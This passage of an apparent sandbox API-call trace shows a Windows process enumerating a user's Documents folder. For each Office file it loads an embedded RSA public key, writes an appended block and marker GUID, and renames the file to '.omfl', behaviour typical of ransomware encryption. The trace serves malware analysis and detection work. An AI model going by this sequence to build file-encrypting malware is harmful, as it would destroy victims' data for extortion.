(HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.754] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.754] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.754] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.754] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.754] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.754] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.754] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.754] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.754] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.754] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.755] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.755] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.755] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.755] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0xdd29950 [0130.755] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.755] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0130.755] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.755] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.755] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.755] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.755] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.755] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.755] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0xdd29950 [0130.755] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0130.755] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.755] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.755] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0xdd29950 [0130.755] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0130.755] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.755] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.755] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.755] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.755] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.755] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.755] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.755] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.755] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.755] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.755] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.755] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0xdd29950 [0130.755] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.755] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0130.755] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.755] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.755] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.755] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.755] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.756] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.756] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.756] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.756] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.756] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.756] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.756] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.756] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.756] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.756] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.756] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.756] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.756] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.756] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.756] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.756] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.756] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.756] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.756] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.756] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.756] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.756] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0130.756] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.756] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0x74d5850 [0130.756] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.756] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0130.756] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750caf0 [0130.756] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.756] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.756] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d5850 | out: hHeap=0x4970000) returned 1 [0130.756] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0130.756] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.756] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0130.756] PathFindFileNameW (pszPath="") returned="" [0130.756] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.757] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xda5a11c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xda5a11c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0130.757] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.757] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xda5a11c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xda5a11c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0130.757] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aea0, ftCreationTime.dwHighDateTime=0x1d598b1, ftLastAccessTime.dwLowDateTime=0x114279c0, ftLastAccessTime.dwHighDateTime=0x1d5c620, ftLastWriteTime.dwLowDateTime=0x114279c0, ftLastWriteTime.dwHighDateTime=0x1d5c620, nFileSizeHigh=0x0, nFileSizeLow=0x918e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="55g9oYIjeQNJf.xlsx", cAlternateFileName="55G9OY~1.XLS")) returned 1 [0130.757] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5bb8 [0130.757] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8e) returned 0xdd14728 [0130.757] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5bb8 | out: hHeap=0x4970000) returned 1 [0130.757] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\55g9oYIjeQNJf.xlsx") returned=".xlsx" [0130.757] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\55g9oYIjeQNJf.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\55g9oyijeqnjf.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.757] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=37262) returned 1 [0130.757] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.760] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x9168, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.760] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.761] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.761] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.761] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.761] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x918e, lpOverlapped=0x0) returned 1 [0130.761] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.761] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.761] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.761] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.761] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0130.762] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.762] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.762] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.763] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.763] GetLastError () returned 0x0 [0130.763] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.763] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0130.763] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.763] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.763] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.763] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.763] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.763] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.764] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x918e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.764] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.764] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0130.764] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.764] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.764] CloseHandle (hObject=0x5c8) returned 1 [0130.770] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\55g9oYIjeQNJf.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\55g9oyijeqnjf.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\55g9oYIjeQNJf.xlsx.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\55g9oyijeqnjf.xlsx.omfl")) returned 1 [0130.772] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3449c5c0, ftCreationTime.dwHighDateTime=0x1d5e34b, ftLastAccessTime.dwLowDateTime=0x2f14e550, ftLastAccessTime.dwHighDateTime=0x1d5dafc, ftLastWriteTime.dwLowDateTime=0x2f14e550, ftLastWriteTime.dwHighDateTime=0x1d5dafc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aFM0SjkBF-UdBxYLzMZ", cAlternateFileName="AFM0SJ~1")) returned 1 [0130.772] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a09ae0, ftCreationTime.dwHighDateTime=0x1d5ca72, ftLastAccessTime.dwLowDateTime=0xb54b1000, ftLastAccessTime.dwHighDateTime=0x1d5cfc5, ftLastWriteTime.dwLowDateTime=0xb54b1000, ftLastWriteTime.dwHighDateTime=0x1d5cfc5, nFileSizeHigh=0x0, nFileSizeLow=0xc0f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BAz0zTpz.docx", cAlternateFileName="BAZ0ZT~1.DOC")) returned 1 [0130.772] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BAz0zTpz.docx") returned=".docx" [0130.772] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BAz0zTpz.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\baz0ztpz.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.773] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=49396) returned 1 [0130.773] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.776] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xc0ce, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.776] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.777] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0xc0f4, lpOverlapped=0x0) returned 1 [0130.778] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.778] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.778] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.778] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0130.779] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.779] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.779] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.779] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.779] GetLastError () returned 0x0 [0130.779] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.779] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0130.779] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.780] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.780] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.780] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.781] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xc0f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.781] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.781] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.781] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.781] CloseHandle (hObject=0x5c8) returned 1 [0130.785] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BAz0zTpz.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\baz0ztpz.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\BAz0zTpz.docx.omfl" 